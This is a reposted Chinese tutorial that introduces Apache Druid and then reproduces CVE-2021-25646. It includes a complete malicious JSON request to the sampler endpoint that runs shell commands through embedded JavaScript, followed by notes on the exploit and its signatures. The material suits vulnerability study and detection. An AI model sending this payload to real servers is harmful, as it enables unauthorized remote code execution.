Apache Druid

news2025/6/6 9:00:39

目录

Apache Druid是什么?

CVE-2021-25646(Apache Druid代码执行漏洞)


Apache Druid是什么?

        Apache Druid是一个高性能、分布式的数据存储和分析系统。设计用于处理大量实时数据,并进行低延迟的查询。它特别适合用于分析大规模日志、事件数据和时间序列函数数据。Druid支持快速聚合查询,并能够在数秒钟内处理百万条数据。通常用于构建实时数据分析平台,广泛应用于金融,广告、loT等领域。

Druid的特点包括;

  • 高吞吐量和低延迟:支持快速数据插入和查询,适合实时数据分析。
  • 可扩展性:可以在分布式环境中水平扩展,处理大量数据。
  • 灵活的查询能力:支持复杂的聚合、过滤和分组操作,能够应对大数据查询需求。
  • 容错性:通过数据复制和分布式架构,确保高可用性和数据的持久性。

Druid核心应用场景包括实时数据分析、BI、仪表盘以及事件流分析。 

CVE-2021-25646(Apache Druid代码执行漏洞)

漏洞成因:Apache Druid包括执行嵌入在各种请求中的用户提供的JavaScript代码的能力。这个功能是为了在可信环境下,并且默认是禁用得。但是在Druid 0.20.0及以前版本,攻击者通过发送一个恶意请求是Druid用内置引擎执行任意的JavaScript代码,且服务器配置无效。

具体原理:https://mp.weixin.qq.com/s/McAoLfyf_tgFIfGTAoRCiw

步骤1:构造恶意数据包发送

POST /druid/indexer/v1/sampler HTTP/1.1
Host: your-ip:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json

{
    "type":"index",
    "spec":{
        "ioConfig":{
            "type":"index",
            "firehose":{
                "type":"local",
                "baseDir":"/etc",
                "filter":"passwd"
            }
        },
        "dataSchema":{
            "dataSource":"test",
            "parser":{
                "parseSpec":{
                "format":"javascript",
                "timestampSpec":{

                },
                "dimensionsSpec":{

                },
                "function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}",
                "":{
                    "enabled":"true"
                }
                }
            }
        }
    },
    "samplerConfig":{
        "numRows":10
    }
}
  1. 漏洞利用点
  • 通过/druid/indexer/v1/sampler接口发送恶意JSON数据
  • firehose配置尝试读取系统敏感文件/etc/passwd
  • JavaScript解析器中的function字段包含恶意代码,通过Runtime.getRuntime().exec()执行系统命令"id"
  1. 攻击特征
  • 使用java.util.ScannerRuntime.getRuntime()实现命令注入
  • 通过useDelimiter("\\A").next()获取命令执行结果
  • 伪造正常数据结构包含timestampSpec等字段进行伪装

步骤2:查看结果

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2401471.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

使用深蓝词库软件导入自定义的词库到微软拼音输入法

我这有一个人员名单,把它看作一个词库,下面我演示一下如何把这个词库导入微软输入法 首先建一个text文件,一行写一个词条 下载深蓝词库 按照我这个配置,点击转换,然后在桌面微软输入法那右键,选择设置 点…

使用Node.js分片上传大文件到阿里云OSS

阿里云OSS的分片上传(Multipart Upload)是一种针对大文件优化的上传方式,其核心流程和关键特性如下: 1. ‌核心流程‌ 分片上传分为三个步骤: 初始化任务‌:调用InitiateMultipartUpload接口创建上传任务…

复变函数中的对数函数及其MATLAB演示

复变函数中的对数函数及其MATLAB演示 引言 在实变函数中,对数函数 ln ⁡ x \ln x lnx定义在正实数集上,是一个相对简单的概念。然而,当我们进入复变函数领域时,对数函数展现出更加丰富和复杂的性质。本文将介绍复变函数中对数函…

【Linux】Linux程序地址基础

参考博客:https://blog.csdn.net/sjsjnsjnn/article/details/125533127 一、地址空间的阐述 1.1 程序地址空间 下面的图片展示了程序地址空间的组成结构 我们通过代码来验证一下 int g_unval; int g_val 100;int main(int argc, char *argv[]);void test1() {i…

将图形可视化工具的 Python 脚本打包为 Windows 应用程序

前文我们已经写了一个基于python的tkinter库和matplotlib库的图形可视化工具。 基于Python的tkinter库的图形可视化工具(15种图形的完整代码):基于Python的tkinter库的图形可视化工具(15种图形的完整代码)-CSDN博客 在前文基础上&…

无人机军用与民用技术对比分析

一、材料区别 军用无人机: 1. 高强度特种材料: 大量使用钛合金、碳纤维复合材料,兼顾轻量化与高强度,提升抗冲击性和隐身性能。 关键部件依赖进口材料。 2. 隐身涂层: 采用雷达吸波材料和低红外特征涂料&#xf…

刷leetcode hot100--矩阵6/1

1.螺旋矩阵【很久】6/1【感觉就是思路的搬运工,没完全理解】 54. 螺旋矩阵 - 力扣(LeetCode) 原来想 但是如果是奇数矩阵,遍历不到中间 解决思路: 用left,right,top,down标记/限定每次遍历的元素,每次从…

Docker轻松搭建Neo4j+APOC环境

Docker轻松搭建Neo4jAPOC环境 一、简介二、Docker部署neo4j三、Docker安装APOC插件四、删除数据库/切换数据库 一、简介 Neo4j 是一款高性能的 原生图数据库,采用 属性图模型 存储数据,支持 Cypher查询语言,适用于复杂关系数据的存储和分析。…

定制开发开源AI智能名片S2B2C商城小程序在无界零售中的应用与行业智能升级示范研究

摘要:本文聚焦无界零售背景下京东从零售产品提供者向零售基础设施提供者的转变,探讨定制开发开源AI智能名片S2B2C商城小程序在这一转变中的应用。通过分析该小程序在商业运营成本降低、效率提升、用户体验优化等方面的作用,以及其与京东AI和冯…

【大模型:知识图谱】--5.neo4j数据库管理(cypher语法2)

目录 1.节点语法 1.1.CREATE--创建节点 1.2.MATCH--查询节点 1.3.RETURN--返回节点 1.4.WHERE--过滤节点 2.关系语法 2.1.创建关系 2.2.查询关系 3.删除语法 3.1.DELETE 删除 3.2.REMOVE 删除 4.功能补充 4.1.SET (添加属性) 4.2.NULL 值 …

贪心算法应用:装箱问题(BFD算法)详解

贪心算法应用&#xff1a;装箱问题(BFD算法)详解 1. 装箱问题与BFD算法概述 1.1 装箱问题定义 装箱问题(Bin Packing Problem)是组合优化中的经典问题&#xff0c;其定义为&#xff1a; 给定n个物品&#xff0c;每个物品有大小wᵢ (0 < wᵢ ≤ C)无限数量的箱子&#xf…

编程技能:格式化打印05,格式控制符

专栏导航 本节文章分别属于《Win32 学习笔记》和《MFC 学习笔记》两个专栏&#xff0c;故划分为两个专栏导航。读者可以自行选择前往哪个专栏。 &#xff08;一&#xff09;WIn32 专栏导航 上一篇&#xff1a;编程技能&#xff1a;格式化打印04&#xff0c;sprintf 回到目录…

MPLAB X IDE ​软件安装与卸载

1、下载MPLAB X IDE V6.25 MPLAB X IDE | Microchip Technology 正常选Windows&#xff0c;点击Download&#xff0c;等待自动下载完成&#xff1b; MPLAB X IDE 一台电脑上可以安装多个版本&#xff1b; 2、安装MPLAB X IDE V6.25 右键以管理员运行&#xff1b;next; 勾选 I a…

windows编程实现文件拷贝

项目源码链接&#xff1a; 实现文件拷贝功能&#xff08;限制5GB大小&#xff09; 81c57de 周不才/cpp_linux study - Gitee.com 知识准备&#xff1a; 1.句柄 句柄是一个用于标识和引用系统资源&#xff08;如文件、窗口、进程、线程、位图等&#xff09;的值。它不是资…

[6-01-01].第12节:字节码文件内容 - 属性表集合

JVM学习大纲 二、属性表集合&#xff1a; 2.1.属性计数器&#xff1a; 2.2.属性表&#xff1a; 2.3.字节码文件组成5 -> 属性&#xff1a; 1.属性主要指的是类的属性&#xff0c;比如源码的文件名、内部类的列表等 2.4.字节码文件组成3 -> 字段&#xff1a; 1.字段中…

基于机器学习的水量智能调度研究

摘要&#xff1a;随着城市化进程的加速和水资源供需矛盾的日益突出&#xff0c;传统的水量调度模式因缺乏精准预测和动态调控能力&#xff0c;难以满足现代供水系统对高效性、稳定性和节能性的要求。本文针对供水系统中用水峰谷预测不准确、能耗高、供需失衡等核心问题&#xf…

深入浅出 Scrapy:打造高效、强大的 Python 网络爬虫

在数据为王的时代,高效获取网络信息是开发者必备的技能。今天我将为大家介绍 Python 爬虫领域的王者框架——Scrapy。无论你是数据工程师、分析师还是开发者,掌握 Scrapy 都能让你的数据采集效率提升数倍! 项目地址:https://github.com/scrapy/scrapy 官方文档:https://do…

贪心算法应用:带权任务间隔调度问题详解

贪心算法应用&#xff1a;带权任务间隔调度问题详解 贪心算法是一种在每一步选择中都采取在当前状态下最好或最优&#xff08;即最有利&#xff09;的选择&#xff0c;从而希望导致结果是全局最好或最优的算法。带权任务间隔调度问题是贪心算法的一个经典应用场景。 问题定义…

用电脑控制keysight示波器

KEYSIGHT示波器HD304MSO性能 亮点&#xff1a; 体验 200 MHz 至 1 GHz 的带宽和 4 个模拟通道。与 12 位 ADC 相比&#xff0c;使用 14 位模数转换器 &#xff08;ADC&#xff09; 将垂直分辨率提高四倍。使用 10.1 英寸电容式触摸屏轻松查看和分析您的信号。捕获 50 μVRMS …

LLaMA-Factory - 批量推理(inference)的脚本

scripts/vllm_infer.py 是 LLaMA-Factory 团队用于批量推理&#xff08;inference&#xff09;的脚本&#xff0c;基于 vLLM 引擎&#xff0c;支持高效的并行推理。它可以对一个数据集批量生成模型输出&#xff0c;并保存为 JSONL 文件&#xff0c;适合大规模评测和自动化测试。…